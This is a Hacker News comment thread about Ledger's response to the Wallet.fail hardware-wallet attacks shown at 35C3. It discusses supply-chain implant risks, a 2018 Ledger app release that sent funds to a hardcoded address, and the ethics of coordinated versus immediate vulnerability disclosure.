
Still Got Your Crypto: In Response to Wallet.fail’s Presentation - asymmetric
https://www.ledger.fr/2018/12/28/chaos-communication-congress-in-response-to-wallet-fails-presentation/
======
pmorici
This seems a little disingenuous to me. The implication of the first attack is
not that someone might sneak into your house and modify your Ledger hardware.
It's that hardware could come to you with modified firmware from the get go.

~~~
32032141
This is largely the issue with 'hardware wallets', the security models aren't
particularly well defined and this leads to ambiguity like this. You're
absolutely correct in that the concern is the device is not genuine, which is
what attestation of the firmware is supposed to prevent. In the case of the
Ledger, the attestation doesn't prove anything about the safety of the device
unfortunately for a number of reasons (this attack, and other logical ones).

The obvious one is that the security domains in the device are idiotic.
There's a "secure" processor with almost no processing power or IO, and a
"insecure" one which handles the screen, buttons and IO. Both of them handle
secrets (for example, the seed shown on the screen), which leaves you with
essentially no gain whatsoever.

The more logical hardware implant than the one shown at CCC is a bluetooth
module that can simply read the I2C lines going to the screen and transmit the
seed as a beacon whenever it is plugged in. This has the advantage of not
needing presence as with their demonstration, and with assistance doesn't need
any physical presence.

I described this as a concept for a security review of a cold storage setup
which was "unbreakable". Is this sort of thing realistic? Perhaps. Is a $5
wrench attack more sensible? Probably. It's worth considering what supply
chain attacks are possible though.

~~~
lima
> The obvious one is that the security domains in the device are idiotic.
> There's a "secure" processor with almost no processing power or IO, and a
> "insecure" one which handles the screen, buttons and IO. Both of them handle
> secrets (for example, the seed shown on the screen), which leaves you with
> essentially no gain whatsoever.

I think the idea is that the secure processor will verify the insecure
processor's firmware (the "MCU check"), making such attacks impractical.

Of course, the design is broken and it can be bypassed by emulation, but
security isn't all or nothing - "no gain whatsoever" is not true.

~~~
32032141
Even if the firmware on both firmwares are completely virgin, this doesn't say
much about the safety of the device. I agree that security is not all or
nothing, protection in layers is always the goal of secure products. I do
however caution that it can cause complacency if things are presented as
bulletproof, you need to be up front about what tools such as attestation
afford you. In this case it can not tell you that the device is safe or not
tamptered with.

------
paulpauper
i have occasionally heard stores of ppl losing funds from hardware wallets.
usually it's after buying it on Amazon.

~~~
coralreef
Its usually because the buyer was duped into following a fake instruction
setup. The scammer will produce an official physical 'card' of recovery words
that ships with the wallet, tricking the user into putting money into accounts
that the scammer also has access to.

------
Ayesh
I didn't watch the 35c3 presentation, but it certainly looks like it's an
absurd attack. Kudos to Ledger people for constructively replying to it.

Some talks in 35c3, defcon, etc remind me of the rubber hose security
([https://xkcd.com/538/](https://xkcd.com/538/)).

On the other hand, www.ledger.fr web site does not properly redirect to HTTPS
(e.g [http://www.ledger.fr/bounty-program/](http://www.ledger.fr/bounty-
program/)) and that would've been a more practical one.

~~~
32032141
Ledger has for a long time been grossly inept in security, there's really
nothing absurd about this attack at all. In the Bitcoin industry we frequently
see very detailed setup for long timeframe attacks and substantial effort
going into identity theft and physical compromise. Worse, for these deices in
particular a backdoored device is almost undetectable due to the way ECDSA can
be used to transmit encrypted data in its signatures.

Ledger was recently compromised, or showed that they have no release process
(both equally bad) by releasing a version of their application which stole
user funds. Their claim is that they released a development version from a
dirty git clone that contained "testing" code which happened to have a
hardcoded address for sending every transaction to.

[https://www.ledger.fr/2018/08/03/important-message-
concernin...](https://www.ledger.fr/2018/08/03/important-message-concerning-
the-ledger-wallet-ethereum-chrome-app/)

~~~
tgsovlerkhgsel
That's indeed impressively bad. The full address seems to be
[https://etherscan.io/address/0xC33B16198DD9FB3bB342d8119694f...](https://etherscan.io/address/0xC33B16198DD9FB3bB342d8119694f94aDfcdca23)

There don't seem to be any outbound transactions from that address, so Ledger
refunded the victims separately instead of sending the funds back. That means
they likely don't control the key. OTOH, the funds (worth about $40k for the
Ether + another $20k for the tokens) haven't moved at all, so "test key that
was lost long ago" does seem plausible. (Especially since it also was used on
the testnet before
[https://ropsten.etherscan.io/address/0xC33B16198DD9FB3bB342d...](https://ropsten.etherscan.io/address/0xC33B16198DD9FB3bB342d8119694f94aDfcdca23))

Could of course also be an attacker who was hoping for a bigger loot and
didn't want to risk getting caught over $60k, but as you said, not sure what's
worse - incompetence or compromise.

~~~
32032141
Yep.

Either they are so incompetent that they released software out of their git
tree from someone's work environment, and had absolutely no process to catch a
ridiculous and obvious failure. Otherwise they got popped and are lying about
it. Neither is anything but a disaster.

------
anonymouzz
What bothers me is that they did not responsibly disclose the vulnerabilities
to the manufacturers ahead of time. This is not moral, and I'm not sure what
one gains by not doing that. I think that conference organizers should
pressure presenters to do that before talks.

Either that or attendees should apply bottom up pressure and ask live
questions like "what did you do to responsibly disclose this issue?". I think
I'll do that on future security conferences I attend.

~~~
Canada
I wish the everyone would stop using the term "responsible" to describe
"coordinated" disclosure. Researchers do not owe vendors any cooperation at
all. It is perfectly moral to present factual information without any notice
whatsoever. I think there's often something to gain through coordinated
disclosure, but not always, and it's not your choice to make unless we're
talking about your own findings.

~~~
32032141
Agreed. Researchers owe the companies absolutely nothing.

~~~
anonymouzz
It's not about the companies. I do not care much about them.

It's about people that may be hacked between someone's 0day disclosure and
manufacturer's response. And if the manufacturer doesn't care to fix the bug -
roast them about that. It's their fault.

It's not moral because people (not companies) may suffer. Your actions have
consequences.

~~~
jstanley
The vulnerability doesn't pop into existence the second it is publicly
announced. It was already there. Everybody was already vulnerable.

At least if it's publicly announced people can take steps to defend against
it.

~~~
anonymouzz
Yes but why not send a single email to the manufacturer before making it
public? Does it really hurt so much?

From a "cyberpunk hacker" mentality this only gives you an opportunity to
roast the manufacturer if they do nothing. Perhaps even bankrupt them, I don't
care. Competition will take their places and hopefully be better.

~~~
tgsovlerkhgsel
> Does it really hurt so much?

Potentially yes. The manufacturer may attempt to prevent publication through
legal threats or action, which can be annoying and expensive even if you
ultimately win. The incentive to be annoying goes down significantly once the
disclosure cannot be prevented (because it's already public) and the public is
watching (i.e. any action against the researcher has a higher likelihood of
public backlash).

It also allows the manufacturer, who is likely more experienced and has more
resources, to start PR to downplay the attack.

I generally default to responsible/coordinated disclosure, but I also do my
research first. If the company has previously shown undesirable behavior (like
the stuff I've described), or I've reported to them previously and didn't like
the experience, they'll learn about the disclosure from the news.

